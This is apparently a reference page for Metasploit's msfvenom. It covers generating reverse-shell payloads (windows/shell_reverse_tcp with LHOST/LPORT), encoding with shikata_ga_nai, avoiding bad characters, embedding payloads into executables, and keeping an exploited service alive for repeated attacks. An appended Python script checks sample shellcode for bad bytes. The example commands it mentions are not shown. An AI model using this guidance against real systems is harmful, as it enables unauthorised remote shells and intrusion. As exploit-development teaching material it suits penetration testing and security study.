msfvenom
msfvenom is an executable from Metasploit that generates payloads in numerous formats (ELF, PE, raw shellcode, PowerShell, etc.) for binary exploitation, client-side attacks and many other purposes.
Usage
msfvenom <options...>

-p <payload> <options>: the payload and its options, e.g. -p windows/shell_reverse_tcp LHOST=... with
    LHOST=<local ip>
    LPORT=8888
    EXITFUNC=thread (exit gracefully with the ExitThread method)
-f <format>: payload output format, e.g. c or py for a C- or Python-styled string, exe or elf for a binary
-v <varname>: variable name used in the shellcode string output
-e <encoder>: encoder for the payload, e.g. -e x86/shikata_ga_nai
-i <iters>: number of encoding iterations
-b <badchars>: bad characters the output must not contain, e.g. -b "\x00\x0a\x0d\x25\x26\x2b\x3d"
-x <embedfile>: file / executable to embed the payload into
Examples
Windows
This snippet is intended for a Windows buffer overflow in a threaded application over HTTP & TCP.
- Change the LHOST IP address in the snippet
- Start a listener / handler on port 8888
Set EXITFUNC on threaded servers/applications!
ExitThread only terminates the thread that ran the payload, so the same service instance can be exploited again. Otherwise the service will crash after the first exploitation attempt.
Linux
This snippet generates generic reverse shell shellcode as a Python string (e.g. for exploit development).
- Change the LHOST IP address
- Start a listener on port 8888.
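As an added example (not part of the original page), a small Python check that reads the -f py output format and confirms the resulting shellcode really avoids every byte listed with -b. PY_OUTPUT is a constructed sample shaped like -f py output, not a real payload, and the regex assumes the `buf += b"\x.."` layout that format prints.

```python
import ast
import re
from typing import List, Set, Tuple

# Constructed sample in the shape of `msfvenom -f py` output; the byte values are
# made up for this demonstration and do not form a working payload.
PY_OUTPUT = r'''buf =  b""
buf += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31"
buf += b"\xc0\x64\x8b\x50\x30\x0a\x8b\x52\x0c\x25"
'''

# One byte-string literal made only of \xNN escapes, with or without the b prefix.
LITERAL = re.compile(r'b?"((?:\\x[0-9a-fA-F]{2})*)"')


def parse_py_output(text: str) -> bytes:
    """Concatenate the literals of the -f py format into raw shellcode.

    ast.literal_eval is used on each literal instead of exec, so output copied
    from an untrusted place is parsed, never executed."""
    out = b""
    for m in LITERAL.finditer(text):
        out += ast.literal_eval('b"' + m.group(1) + '"')
    return out


def parse_badchars(spec: str) -> Set[int]:
    """Turn a -b argument such as "\\x00\\x0a\\x0d" into a set of byte values."""
    hexes = re.findall(r"\\x([0-9a-fA-F]{2})", spec)
    if not hexes:
        raise ValueError("no \\xNN escapes found in bad-character spec")
    return {int(h, 16) for h in hexes}


def find_badchars(shellcode: bytes, bad: Set[int]) -> List[Tuple[int, int]]:
    """Return (offset, byte) for every forbidden byte present in the blob."""
    return [(i, b) for i, b in enumerate(shellcode) if b in bad]


def check_output(text: str, spec: str) -> List[Tuple[int, int]]:
    """Parse -f py text and report where the -b bytes still occur (empty list = clean)."""
    return find_badchars(parse_py_output(text), parse_badchars(spec))


if __name__ == "__main__":
    for off, b in check_output(PY_OUTPUT, r"\x00\x0a\x0d\x25\x26\x2b\x3d"):
        print(f"bad byte 0x{b:02x} at offset {off}")
```

This matters when the output has been hand-edited or pushed through another tool, where the guarantee that -b gave at generation time no longer holds; an encoder's decoder stub must avoid the listed bytes too, which is why msfvenom may fail to find a usable encoder for a long bad-character list.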